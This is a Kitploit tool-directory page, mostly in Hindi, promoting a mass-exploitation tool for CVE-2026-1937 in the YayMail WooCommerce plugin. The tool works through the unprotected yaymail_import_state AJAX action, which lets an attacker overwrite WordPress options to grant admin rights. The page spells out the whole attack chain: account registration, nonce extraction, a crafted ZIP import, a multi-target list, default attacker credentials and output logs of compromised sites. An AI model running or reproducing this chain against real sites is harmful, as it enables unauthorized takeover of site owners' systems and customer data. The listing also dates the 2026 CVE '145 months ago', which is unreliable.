Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-1937 — YayMail <= 4.3.2 - 'yaymail_import_state' AJAX Action के माध्यम से प्रमाणित (Shop Manager+) उपयोगकर्ताओं द्वारा मनमाना विकल्प अद्यतन करने के लिए लापता प्राधिकरण | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2026-1937
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubnxploited/cve-2026-1937

CVE-2026-1937

YayMail <= 4.3.2 - 'yaymail_import_state' AJAX Action के माध्यम से प्रमाणित (Shop Manager+) उपयोगकर्ताओं द्वारा मनमाना विकल्प अद्यतन करने के लिए लापता प्राधिकरण

रिपॉजिटरी देखें
145 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Typing SVG


🔴 भेद्यता अवलोकन

CVE-2026-1937 — लापता प्राधिकरण → मनमाना विकल्प अद्यतन → विशेषाधिकार वृद्धि

फ़ील्डविवरण
CVE आईडीCVE-2026-1937
गंभीरताHIGH — CVSS v3.1 स्कोर: 7.2
वेक्टरCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
शोधकर्ताDaniel Basta (whizzu) — NASK PIB
सार्वजनिक रूप से प्रकाशित17 फ़रवरी, 2026
अंतिम अद्यतन27 मार्च, 2026
प्रभावित सॉफ़्टवेयरYayMail – WooCommerce Email Customizer Plugin for WordPress
प्रभावित संस्करण4.3.2 तक के सभी संस्करण
भेद्यता प्रकारलापता प्राधिकरण → अनधिकृत मनमाना विकल्प अद्यतन → विशेषाधिकार वृद्धि
प्रमाणीकरण आवश्यकहाँ — Shop Manager स्तर या उससे ऊपर
CWECWE-862: लापता प्राधिकरण

विवरण:
WordPress के लिए YayMail – WooCommerce Email Customizer प्लगइन, 4.3.2 तक के सभी संस्करणों में, विशेषाधिकार वृद्धि (Privilege Escalation) की ओर ले जाने वाले अनधिकृत डेटा संशोधन के प्रति संवेदनशील है। yaymail_import_state AJAX क्रिया बिना किसी सर्वर-साइड क्षमता जाँच के पंजीकृत है, जिससे Shop Manager-स्तर या उससे ऊपर की पहुँच रखने वाले प्रमाणित हमलावर इसे स्वतंत्र रूप से आमंत्रित कर सकते हैं। एक क्राफ्टेड ZIP आयात फ़ाइल अपलोड करके, हमलावर WordPress साइट के मनमाने विकल्पों को चुपचाप अधिलेखित कर सकता है — जिसमें नए उपयोगकर्ता पंजीकरण की डिफ़ॉल्ट भूमिका को administrator पर सेट करना और खुला सार्वजनिक पंजीकरण सक्षम करना शामिल है। एक बार ये विकल्प इंजेक्ट हो जाने पर, कोई भी आगंतुक साइट पर स्व-पंजीकरण कर सकता है और पूर्ण WordPress व्यवस्थापक खाता प्राप्त कर सकता है, जिसके परिणामस्वरूप साइट पूरी तरह से समझौता हो जाती है।


🛠️ टूल विवरण

यह YayMail प्लगइन के संवेदनशील संस्करण चला रहे WordPress + WooCommerce इंस्टॉलेशन को लक्षित करने वाली एक Proof-of-Concept (PoC) सामूहिक शोषण श्रृंखला है। यह टूल पूर्ण एंड-टू-एंड हमले को लागू करता है: WooCommerce पंजीकरण → लॉगिन → YayMail nonce निष्कर्षण → yaymail_import_state शोषण → व्यवस्थापक सत्यापन।

🔗 पूर्ण आक्रमण श्रृंखला

[Phase 1 — Registration]
  GET  /my-account/  →  Extract WooCommerce register nonce
  POST /my-account/  →  Register new account (WooCommerce form)
  → Save credentials to reg.txt

          ↓

[Phase 2 — Login]
  POST /wp-login.php         →  Try WordPress native login
  POST /my-account/ (WooC.)  →  Fallback WooCommerce login
  → Establish authenticated session

          ↓

[Phase 3 — Admin Pre-check]
  GET /wp-admin/  →  If already admin, skip to result

          ↓

[Phase 4 — YayMail Exploit]
  GET /wp-admin/admin.php?page=yaymail-settings
  → Extract: ajax_url + nonce

  POST /wp-admin/admin-ajax.php
  action=yaymail_import_state
  nonce=<extracted_nonce>
  import_file=yaymail_backup.zip
  → Override WordPress options:
    · default_role = administrator
    · users_can_register = 1

          ↓

[Phase 5 — Admin Verification]
  GET /wp-admin/        → Check adminmenu / wp-admin-bar
  GET /wp-admin/users.php   → Confirm manage_options access

          ↓

[Save to Nx_admin.txt]
  Format: [timestamp] https://target.com user:<u> pass:<p>

📋 आवश्यकताएँ

सिस्टम आवश्यकताएँ

  • Python 3.8 या उच्चतर
  • Linux / Windows / macOS
  • yaymail_backup.zip — क्राफ्टेड आयात पेलोड (आवश्यक)

पायथन निर्भरताएँ

pip install requests urllib3 rich

या requirements फ़ाइल के माध्यम से:

pip install -r requirements.txt

requirements.txt:

requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

🚀 स्थापना

# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-1937.git
cd CVE-2026-1937

# Install dependencies
pip install -r requirements.txt

# Place your crafted import payload in the same directory
cp /path/to/yaymail_backup.zip .

# Run the tool
python3 CVE-2026-1937.py

⚙️ उपयोग

बुनियादी निष्पादन

python3 CVE-2026-1937.py

यह टूल Rich द्वारा संचालित पूर्णतः इंटरैक्टिव टर्मिनल इंटरफ़ेस का उपयोग करता है।


🗂️ लक्ष्य सूची प्रारूप

एक सादा टेक्स्ट फ़ाइल बनाएँ (डिफ़ॉल्ट: list.txt) — प्रति पंक्ति एक लक्ष्य:

https://target1.com
https://target2.com
http://target3.com
target4.com

जिन लक्ष्यों के साथ http:// या https:// नहीं है, उनके आगे स्वतः https:// जोड़ दिया जाता है।


🖥️ इंटरैक्टिव संकेत

Username   [Nx_admin]:          Nx_admin
Password   [Nx_adminSA]:        Nx_adminSA
Email      [[email protected]]: [email protected]
Targets file [list.txt]:        list.txt
Threads [3]:                    5
HTTP timeout (seconds) [10]:    10

📦 पेलोड फ़ाइल — yaymail_backup.zip

इस शोषण के लिए एक क्राफ्टेड YayMail आयात ZIP फ़ाइल की आवश्यकता होती है जो आयात करने पर निम्नलिखित WordPress विकल्पों को अधिलेखित कर देती है:

WordPress विकल्पइंजेक्ट किया गया मान
default_roleadministrator
users_can_register1

⚠️ यदि कार्यशील निर्देशिका में yaymail_backup.zip मौजूद नहीं है तो टूल चलने से इनकार कर देगा।


🔬 संवेदनशील AJAX एंडपॉइंट

POST /wp-admin/admin-ajax.php
action=yaymail_import_state
nonce=<extracted_from_yaymail_settings_page>
import_file=yaymail_backup.zip  (multipart upload)

मूल कारण:
yaymail_import_state हैंडलर आयात को संसाधित करने से पहले current_user_can() या किसी समकक्ष क्षमता जाँच को कॉल नहीं करता है। shop_manager भूमिका (या उससे ऊपर) रखने वाला कोई भी उपयोगकर्ता इस क्रिया को स्वतंत्र रूप से आमंत्रित कर सकता है और ZIP आयात तंत्र के माध्यम से wp_options तालिका की मनमानी प्रविष्टियों को अधिलेखित कर सकता है।


🔍 जाँचे गए WooCommerce पृष्ठ

यह टूल पंजीकरण और लॉगिन फ़ॉर्म के लिए निम्नलिखित पथों को स्वतः स्कैन करता है:

/my-account/       /my_account/      /My-account/
/account/          /myaccount/       /customer-login/
/login/            /register/        /sss/

📁 आउटपुट फ़ाइलें

फ़ाइलविवरण
reg.txtक्रेडेंशियल्स सहित सभी सफल WooCommerce पंजीकरण
Nx_admin.txtसभी पुष्टिकृत व्यवस्थापक विशेषाधिकार वृद्धि

✅ आउटपुट प्रारूप

reg.txt:

[2026-03-01 14:22:10] https://target.com user:Nx_admin email:[email protected] pass:Nx_adminSA

Nx_admin.txt:

[2026-03-01 14:22:18] https://target.com user:Nx_admin pass:Nx_adminSA | yaymail import

🖥️ टर्मिनल आउटपुट नमूना

╔══════════════════════════════════════════════════════════════════╗
║  WooCommerce · YayMail · Mass Exploit Chain                      ║
║  By: Nxploited  |  GitHub: github.com/Nxploited  |  @Kxploit    ║
╚══════════════════════════════════════════════════════════════════╝
टूल डाउनलोड करें